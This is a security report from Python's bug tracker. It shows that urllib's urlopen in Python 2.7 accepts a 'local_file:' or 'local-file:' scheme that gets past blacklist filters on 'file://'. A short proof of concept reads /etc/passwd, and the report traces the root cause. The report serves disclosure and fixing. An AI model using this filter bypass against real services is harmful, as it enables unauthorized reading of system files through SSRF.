New submission from Sihoon Lee <[email protected]>:
An unnecessary scheme exists in urllib's urlopen().
When people want to protect against reading the file system through an HTTP request made with urlopen(),
they often filter like this against SSRF.
# Vulnerability PoC
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
The result is:
##
# User Database
#
# Note t
But if we use a scheme like this, urlparse() cannot parse the scheme.
This is the parsed result:
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='',
query='', fragment='')
def request(url):
    from urllib import urlopen
    from urlparse import urlparse
    result = urlparse(url)
    scheme = result.scheme
    if not scheme:
        return False  # raise Exception("Required scheme")
    if scheme == 'file':
        return False  # raise Exception("Don't open file")
    res = urlopen(url)
    content = res.read()
    print url, content[:30]
    return True
assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False
If they filter only file://, this mitigation can be bypassed for SSRF in this way.
assert request('local-file:/etc/passwd') == True
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='',
query='', fragment='')
URL parsing can also be passed.
# Attack scenario
This is the unnecessary URL scheme ("local_file").
Even if there is filtering, an attacker can read arbitrary files by bypassing it
with this.
# Root Cause
URLopener::open in urllib.py, from line 203:
        name = 'open_' + urltype
        self.type = urltype
        name = name.replace('-', '_')  # this also allows local-file
        if not hasattr(self, name):  # passed here: hasattr(URLopener, 'open_local_file')
            if proxy:
                return self.open_unknown_proxy(proxy, fullurl, data)
            else:
                return self.open_unknown(fullurl, data)
        try:
            if data is None:
                return getattr(self, name)(url)
            else:
                return getattr(self, name)(url, data)  # returns URLopener::open_local_file
It may be just a trick, because people usually use a whitelist (allowing only http or
https). Even so, anyone who uses a blacklist, like filtering file://, will be
affected by triggering SSRF.
----------
components: Library (Lib)
messages: 334905
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Unnecessary URL scheme exists to allow file:// reading file in urllib
type: security
versions: Python 2.7
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue35907>
_______________________________________
_______________________________________________
Python-bugs-list mailing list